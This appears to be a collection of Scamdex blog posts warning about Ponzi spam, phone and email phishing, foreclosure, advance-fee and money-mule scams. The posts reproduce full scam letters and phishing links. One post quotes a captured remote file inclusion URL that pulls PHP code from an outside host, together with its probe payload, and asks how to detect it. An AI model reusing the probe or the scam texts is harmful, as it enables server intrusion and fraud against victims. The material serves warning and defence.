According to Wikipedia, a High Yield Investment Program (aka HYIP) is …

A high-yield investment program (HYIP) is a type of Ponzi scheme, which is an investment scam that promises an unsustainably high return on investment by paying previous investors with the money invested by newcomers.

Ok, yet another scam - so what?

Well, there’s a few spam emails going about currently that sounds like a big one. People will get hurt so it’s my duty to warn you all!

Spam like this one:

Hello,

I would like to introduce the Investment Committee.
I represent Prosperity Organization that is committed to provide with life changing returns and services. Investment programs can bring you no risk
interest to pay of your mortgage

If you are interested, please visit: http://groups.yahoo.com/group/bevetutabykax90/message/1

[OR: Ed.]  http://groups.yahoo.com/group/lohywejyfolyd12/message/1

[OR EVEN: Ed.] http://groups.yahoo.com/group/fujuxoryfymyg58/message/1

Regards,
Moderator

One thing they all have in common is a Yahoo Groups Page as a jump point to the real scammer’s page http://sdhfiweof.com/.

One thing about working in the IT industry for so long (especially working with email systems) has taught me is NEVER BUY PRODUCTS/SERVICES MARKETED BY SPAM, especially if you get several copies of the same spam, esecially if they mention ‘God’, especially if the website owner claims to be from your town, but the domain name/website is registered/hosted in Hong Kong and ESPECIALLY if the website offers an ‘Affiliate Program’ (ie, they let you do the spamming for them!). These jokers fit all of the above. Here’s a Pic of their site:

Now, I’m sure that there is a God-fearing lady called Marta, and there may even be one in Baltimore with two kids, but I’m absolutely certain that this isn’t her. It’s much more likely to be  Fred Milto (FredMilto@gmail.com), a “Private Person” in New York, 10017 - at least that’s who the domain name is registered to.

Of course, Fred (Aka Marta) may not be the owner of this mess - they’re likely to be affiliates and the real scammers ground zero are CherryShares.com

Anyway, I don’t have the time or the resources to investigate this one further, but if anyone knows more or has tried this particular scam, let me know.

The FTC and others have been issuing warnings for years about this scam - here’s one just in case you still don’t believe me From the SEC

and here’s a snippet

Signs of Banking-Related Investment Fraud

Below are warning signs of prime bank or other fraudulent bank-related investment schemes.

Excessive Guaranteed Returns

These fraudulent investment pitches typically offer or guarantee spectacular returns of 20 to 200 percent monthly, absolutely risk free. Promises of unrealistic returns at no risk are hallmarks of prime bank fraud.

Social engineering is an approach used to gain unauthorized access to or acquisition of information assets. This approach relies on misrepresentation and the trusting nature of individuals, and is often carried out through the use of phishing telephone calls or email.
A phishing telephone call or phishing email may sound or look as though it comes from an organization you do business with, such as a bank or government entity, but they are generally from a scammer trying to obtain your personal information under false pretenses.

This particular scam is being carried out by telephone as follows:

An individual leaves a message on an employee’s work phone number, stating they are with the Golden 1 Credit Union. In this scam, the message states that the targeted person’s credit and/or debit card has been temporarily suspended and instructs them to push “1” to reach security. Do not push “1”. If you push “1”, a second recording will ask you put your card number. DO NOT PUT IN YOUR CARD NUMBER!!!!

The following are general practices to avoid becoming a victim of these types of scams:

• Do not respond to unsolicited (spam) e-mail. Simply delete it.
• Be skeptical of individuals representing themselves as officials soliciting personal information via e-mail, telephone or other means.
• Do not click on links contained within an unsolicited e-mail.
• Be cautious of e-mail claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders.
• Validate the legitimacy of the organization by directly accessing the organization’s website rather than following an alleged link to the site.
• Do not provide personal or financial information to anyone who solicits information.

The Golden 1 Credit Union has been made aware of this scam. Additional information from Golden 1 Credit Union regarding fraud is available on their website at: https://www.golden1.com/privacysecurity/phonefraud.aspx

In February 2009, President Obama directed a 60-day review of the plans, programs and activities underway throughout the government that address communications and information infrastructure (i.e., cyberspace). The purpose was to develop a strategic framework to ensure that initiatives in this area are integrated, resourced and coordinated appropriately, both within the Executive Branch and with Congress and the private sector.

Taking a step backwards and acknowledging the inter-connectiveness of just-about-everything was an important step on the road to formulating some policies. What those policies are will be important for the whole world, not just the US. The fact is that your ability to buy a new book online from Amazon with one click also makes it easy for people to clean out your bank account or foreign aggressors to bring down your local power plant.

The review (read the whole thing here) makes 10 short-term action items:

1. Appoint a cybersecurity policy official (aka Cyber Czar) responsible for coordinating the Nation’s cybersecurity policies and activities, working within the NSC and NEC to coordinate interagency development of cybersecurity-related strategy and policy.
2. Prepare an updated national strategy to secure the information and communications infrastructure.
3. Designate cybersecurity as one of the President’s key management priorities and establish performance metrics.
4. Designate a privacy and civil liberties official to the NSC cybersecurity directorate.
5. Convene appropriate interagency mechanisms to conduct interagency-cleared legal analyses of priority cybersecurity-related issues.
6. Initiate a national public awareness and education campaign to promote cybersecurity.
7. Develop U.S. Government positions for an international cybersecurity policy framework.
8. Prepare a cybersecurity incident response plan.
9. Develop a framework for research and development strategies that focus on game-changing technologies that have the potential to enhance the security, reliability, resilience, and trustworthiness of digital infrastructure; provide the research community access to event data to facilitate developing tools, testing theories, and identifying workable solutions.
10. Build a cybersecurity-based identity management vision and strategy that addresses privacy and civil liberties interests, leveraging privacy-enhancing technologies for the Nation.

Phew!

Scamdex is all for making the Internet safer and is prepared to give up a little of the immense freedom we currently hold dear but if this just becomes a handover of ‘control’ to Government-backed special interests then it will be a cynical and sad exercise. A light touch is what is needed, not a hammer!

Melissa Hathaway, Cybersecurity Chief at the National Security Council, had something to add on her blog

… cyberspace underpins almost every facet of modern society and provides critical support for the U.S. economy, civil infrastructure, public safety and national security.

Protecting cyberspace requires strong vision and leadership and will require changes in policy, technology, education, and perhaps law. The 60-day cyberspace policy review summarizes our conclusions and outlines the beginning of a way forward in building a reliable, resilient, trustworthy digital infrastructure for the future. There are opportunities for everyone—individuals, academia, industry, and governments—to contribute toward this vision. During the review we engaged in more than 40 meetings and received and read more than 100 papers that informed our recommendations. As you will see in our review there is a lot of work for us to do together and an ambitious action plan to accomplish our goals. It must begin with a national dialogue on cybersecurity and we should start with our family, friends, and colleagues.

We are late in addressing this critical national need and our response must be focused, aggressive, and well-resourced. … Ensuring that cyberspace is sufficiently resilient and trustworthy to support U.S. goals of economic growth, civil liberties and privacy protections, national security, and the continued advancement of democratic institutions requires making cybersecurity a national priority.

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal - when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviously hack-attempts  is to block the IP address or use rewriterules to send them to an oh-so-friendly  ‘go away page‘ :).

In this case, the URL carries a payload that is itself a  link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’  on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?

Analyzing the url gets me to this reduction of required parts:

* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’

will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour - WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it - or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening…. where have all the gurus gone?

The US Trustee Program, part of the US DoJ, runs the Federal bankruptcy system, monitoring the conduct of people involved in bankruptcy cases, ensuring compliance with applicable laws and investigating bankruptcy fraud and abuse.
They recently issued the following warning for people who are already overwhelmed by the legal juggernaut of a bankruptcy filing and are at serious risk of being scammed out of what little they have left.

DON’T GET “LOCKED OUT” OF YOUR HOME BY A BANKRUPTCY SCAM OPERATOR

Are you having trouble making your home mortgage payments? Are you facing foreclosure on your home? Get all the facts before you pay someone to help you work out your mortgage problems.
“Bankruptcy foreclosure scams” target people whose home mortgages are in trouble. Scam operators advertise over the Internet and in local publications, distribute flyers, or contact people whose homes are listed in the foreclosure notices. Sometimes they direct their appeals to specific religious or ethnic groups.

These scam operators may promise to take care of your problems with your mortgage lender or to obtain refinancing for you. Sometimes they also ask you to pay your mortgage payments directly to the scam operator. They may even ask you to hand over your property deed to the operator, and then make payments to the operator in order to stay in your home.

But instead of contacting your lender or refinancing your loan, the scam operator pockets all the money you paid, and then files a bankruptcy case in your name — sometimes without your knowledge.

A bankruptcy filing often stops a home foreclosure, but only temporarily. If a bankruptcy is filed in your name but you don’t participate in the case, the judge will dismiss the case and the foreclosure proceedings will continue.

If this happens, you will lose the money you paid to the scam operator — AND YOU COULD LOSE YOUR HOME. You will also have a bankruptcy listed on your credit record for years afterward.

Proceed with care if an individual or company:

• Calls itself a “mortgage consultant,” “foreclosure service,” or similar name.
• Contacts or advertises to people whose homes are listed for foreclosure.
• Collects a fee before it provides services to you.
• Tells you to make your home mortgage payments directly to the individual or company.
• Tells you to transfer your property deed or title to the individual or company.

If you can’t pay your mortgage, call your mortgage lender or contact a lawyer for help. Your state or local bar association may be able to help you find low-cost legal help.
If you think an individual or company is running a mortgage foreclosure scam, contact the local office of the United States Trustee. The United States Trustee is a Justice Department official who monitors the bankruptcy system. Look for your local United States Trustee’s telephone number in your telephone directory or on our web site at www.usdoj.gov/ust/eo/ust_org/office_locator.htm.

In my infrequent callouts to other websites that  (like Scamdex) were  created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.

But first, a recap:

When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.

Since then, the field has  grown - lots of Government-funded sites have sprung up, large Internet organizations  have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers  “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…

But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’

Bob Bear Website Logo

Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.

Please support them - you know it makes sense!

In a lighter vein, here’s one I knocked up myself - guess what I’m reading at the moment!

Though seems unsolicited, this owlmail is a business proposal to you. I appreciate the fact that you have every reason to be suspension, please note this proposal is very real. I will employ you to read it with open mind and act in the best way as directed by your mind and instinct.

My name is Amelia Bundweazel, Chief Operating Goblin (Magical Transactions) of Gringotts Bank (Durmstrang). It is understandable that you might be a little bit apprehensive because you do not know me but I have a lucrative business proposal of mutual benefits to share with you.

In June, 2001, a late client of the bank, a Wealthy Wizard from the Ministry of Magic whom we presumed (rightly or wrongly) to be a relative of yours made a numbered fixed deposit of Twenty-one million Five Hundred Thousand Gold Galleons (GG 21,500,000.00) We later found out that he and his family had been killed in an unfortunate accident involving a mid-air collision between a Magical Defense Forces High Speed Dragon and their flying muggle car (A Reliant Robin).

(See http://www.dailyprophet.com/brknwz/2001-020-20.htm for details).

After further investigation it was also discovered that he did not declare any next of kin and no one except me knows of his deposit in our bank and the secret password (‘Hamza Scamza’). So, the gold is still laying unclaimed deep in our vaults. What bothers me most is that according to the laws of my bank, at the expiration of seven {7} years the gold will turn to ashes and the vault will disappear if nobody applies to claim the funds.

Against this backdrop, my suggestion to you is that I will like you to stand as the next of kin so that you will be able to receive the funds.

I want you to know that I have had everything planned out so that we shall come out successful. I have a memory modification spell prepared that will show that you are his next of kin (AT NO COST OF YOURS), all that is required from you is to provide me with your Full Names and Address so that I can complete the spell. After you have been made the next of kin, I will help move the contents of the vault to your own, or made accessible to you with a Wizard Union™ (Secure Floo Network) MTM spell.

There is no risk involved at all in this transaction, As a bank goblin, I am forbidden to reveal the banks secrets so I am taking a great risk in discussing this with you. I am the only one who knows of this situation, good fortune has blessed you with a name that has planted you into the center of relevance in my life. Please endeavor to observe utmost discretion in all matters concerning this issue. Once the funds have been transferred to your vault, we shall share in the ratio of 50% for me, 40% for you and 20% for bribes to Dragons (but this can be subjected to further negotiations). I send you this mail not without a measure of fear as to the consequences, but I know within me that nothing ventured is nothing gained and that success and riches never come easy or on a platter of gold. Please observe this instruction religiously.

Should you be interested please send me your,

1, Full Names,

2, Current Contact Address,

3, Bank Vault Personal Identification Spell (PIS)

And I will prefer you reach me on my private email address: Graham.crabbe@yahoo.wiz and finally after that I shall furnish you with more information’s about this operation. Your earliest response to this letter will be appreciated.

Kind Regards,

Amelia Bundweazel,

Graham.crabbe@yahoo.wiz

__________________________________________________________________________________

Yahoo.wiz – Get your own free owlmail account today!

Was this message Owlspam? Report it to owlspam@yahoo.wiz
Yahoo.wiz is not responsible for nips, droppings or other owl damage.  Please remember, Owls are only the messenger, treat all owls kindly!
————————————————————————————————————–

THIS OWLMAIL HAS BEEN CHECKED FOR VIRUSES, TROJANS, HEXES, CURSES AND JINXES BY HEXMARSHALL

On a related note, Warner Bros have the following warning at the top of their massively successful-but-oddly-named “Harry Potter Dialogue Centre“.

ALERT - EMAIL FRAUD ADVISORY
There have recently been a number of emails circulating claiming to be casting for upcoming Harry Potter films. Many of these emails request personal information and some have the subject line of “WARNERBROS CASTSEARCH” or something to that effect. This is to advise that Warner Bros. Entertainment Inc. does not engage in casting activity through email. These emails are fraudulent and you should not respond to any such email. Feel free to forward any such messages to anti-piracy@warnerbros.com and we will do our best to investigate the fraudulent activity.

It’s a nice place, the gorgeous design and graphics you’d expect from a movie studio, but the website nazis have been in and issue the usual anti-fan type warnings about posting links to your own websites. I hate this arrogant stance - they abuse and allienate their biggest fans (and customers!) with their intolerant and snarky ‘Intellectual Copyright Protection’ crud.  I once got the most miserable letter from a lawyer when I posted a photo of ‘Miffy’ on a website. I pointed out that this character was my daughter’s favourite, but that thenceforth and notwithstanding, I would be unwilling to buy any more of their ‘Miffy’ themed products.

We have been seeing a lot of members advertising their own websites on the boards. This is not allowed as per our Community Guidelines and the Terms of Usage of the Harry Potter Message Boards. The only place you are allowed to post links to other Harry Potter related sites is on the Web Masters board. If you have a link to your site in your profile you also need to remove the link.

…. if you call yourself any name of any character in the Harry Potter series or allude to any character in the Harry Potter franchise or even mention the name ‘Harry’ and/or ‘Potter’, you will be banned for life and a WB representative will turn up at your house and publicly burn all and any books, posters, videos, video games, Lego, action figures, bedside lamps, keyrings, cellphone covers, candy and/or sleepware (including sheets and all other bedding) that is under the ownership of Voldemort Warner Brothers.

My new friend, Patrick - I Love this guy - he contacts me out of the blue - he’s a high-up in the Hang Seng Bank and yet he find me, despite my never (to my knowledge) having given anyone the slightest idea that I am interested in helping move large amounts of money about - well, what a lucky guess!

While I am ‘a bit apprehensive’, because, after all, I don’t know the guy - he says it will be ‘legally done’ so  what the heck, let’s ROCK$$$!

But on the other hand, he does seem to be taking a risk - ‘I am putting my career and the life of my family at stake’ - not sure quite what that means, if it’s all legal and totally fona bido as he says ….

Oh well, money is money - gimme mine Pat!

Hey, if anyone out there wants to get in on this, just send me $100 (to paypal@scamdex.com) and I’ll be more than happy to send him your name too - perhaps he has more money to ‘transfer’

patrickchankw53@yahoo.com.hk
Mr.Patrick K. W. Chan [patkwchan_53@yahoo.com]

From: Mr.Patrick K. W. Chan
(Executive Director  & Chief financial Officer) Hang Seng Bank Limited
83 Des Voeux Road, Central
Hong Kong SAR

FOR YOUR ATTENTION!

It is understandable that you might be a little bit apprehensive because you do not know me but I have a lucrative business proposal of mutual interest to share with you. I got your reference in my search for someone who suits my proposed business relationship.

I am Mr. Patrick K. W. Chan Executive Director & Chief financial Officer of Hang Seng Bank Ltd. I have an obscured business suggestion for you. I will need you to assist me in executing a business project from Hong Kong to your country. It involves the transfer of a large sum of money. Everything concerning this transaction shall be legally done without hitch. Please endeavour to observe utmost discretion in all matters concerning this issue.

Once the funds have been successfully transferred into your account, we shall share in the ratio to be agreed by both of us.

I will prefer you reach me on my private email address below (patrickchankw53@yahoo.com.hk) and finally after that I shall furnish you with more information’s about this operation.

Please if you are not interested delete this email and do not hunt me because I am putting my career and the life of my family at stake with this venture. Although nothing ventured is nothing gained.

Your earliest response to this letter will be appreciated.

Kind Regards,

Mr. Patrick Chan

Here’s a cute one - of course it’s our old friend the ‘transaction processing clerk’ scam, gussied up a little to be an insurance invoicer/reimburser. What caught my eye was the amusing biz speak which looks like it’s been through the Dialectizer, a website that has been around for years, that will translate any text into your choice of ‘Swedish Chef’,  ‘Elmer Fudd’, ‘Hillbilly’ and many more..

There used to be programs around that juggled a bunch of random ‘buzz words’ to generate idiotic phrases that just might have been used already in your last marketing tigerteam ‘feel the force’ bi-annual synergy meeting. I miss those, innocent days!

Anyway, for your reading pleasure, here’s another spam scam :

Vance Garland [coylh@internationalsos.com]
Julie Mathews. HR department. ID: 461562292291351385756 [HRManagerPIC39@gmail.com]

Dear Job Seeker,

Due to converge of our mutual interests within the boundaries of the employment process, we’d like to manifest provision of the newly opened entry, available for your immediate contemplation.

An expansion process, has inevitably triggered the underscored insurance company to form complementary positions within the market of operation.

We’re providing a feasible opportunity to put your legal background to use in the insurance/accounting sphere. Undoubtedly, our ultimate aim is to bring the confort work environment, stimulating a reciprocal leap towards beneficial and justifying operating conditions.

Informational table is presented below, to briefly outline the opening.

* Benefits and privileges:

-Feasible career advancement opportunities.
-Extensive tutelage (probation period) for the first two months.
-Fixed payout, resulting in 2000 USD monthly.
-Outstanding reimbursement plan.

* Requirements:

- Accuracy and leadership in the assigned operations
- Interpersonal and communication skills.
- Swift decision-making.
- Honesty and law obedience.
- Proficient use of Microsoft Office.

* Primary responsibilities:

- Preparing invoices, compiling itemized charges and submitting bills concerning insurance reimbursement enquiries.
- Commencing insurance operations (reimbursement cases).
- Consolidating viable documentation, records and paperwork.
- This is not insurance sales position and you don’t need to sell insurance, this is Money Manager vacancy.

If you want to apply please send all your questions and contact information ONLY to e-mail:  HRManagerPIC39@gmail.com We’re looking forward to our further communication.

Julie Mathews. HR department.
ID:  461562292291351385756

I got an email today that looks like the archetypal phishing spam - a message from the Federal Reserve with a warning about a ‘large scale phishing attack’ and threats about restrictions being placed on wire transfers through March - a link at the bottom has a domain name that could just possibly be real; ‘bank-net.us’.

This is, if anything, better than average - nice domain name, well written email message (albeit with a few grammatical and spelling errors ["and has been still lasting"]), on the whole, believable….. so the link……

http://ustreasury.bank-net.us/3371091/issue~76099/

FEDERAL RESERVE BANK
Important:

You’re getting this letter in connection with new directions issued by U.S. Treasury Department. The directions concern U.S. Federal Wire and ACH online payments.

On February 17, 2009 a large-scaled phishing attack started and has been still lasting. A great number of banks and credit unions is affected by this attack and quantity of illegal bank transfers has reached an extremely high level.

U.S. Treasury Department, Federal Reserve, America Bankers Association (ABA) and Federal Deposit Insurance Corporation (FDIC) in common worked out a complex of immediate actions for the highest possible reduction of fraudulent operations. We regret to inform you that definite restrictions will be applied to all Federal Wire and ACH transfers from February 23, 2009 till March 6, 2009.

Here you can get more detailed information regarding the affected banks and U.S. Treasury Department restrictions:
http://ustreasury.bank-net.us/3371091/issue~76099/
Federal Reserve Bank System Administration

takes you to an ineptly written web page with a US flag banner and an input box and some hidden dot graphics… and then, after a few seconds, takes you to a porn site.

So, I visited the site again a few minutes later and the US flag page is gone and there is a completely blank page instead.

The site is hosted in Guangdong, China but the domain name is registered to Edward Rosales in Hartford, CT. The domain name was registered today, 23rd Feb 2009.

So…. a pathetic spam switch and bait to get people to go to a porn site, or a fledgling phishing site? or maybe a cunning combination of the two? whichever, I think it’s safe to say that nothing good will come out of bank-net.us anytime soon. If you see anything scammy, let me know, or better still, report it to PhishTank.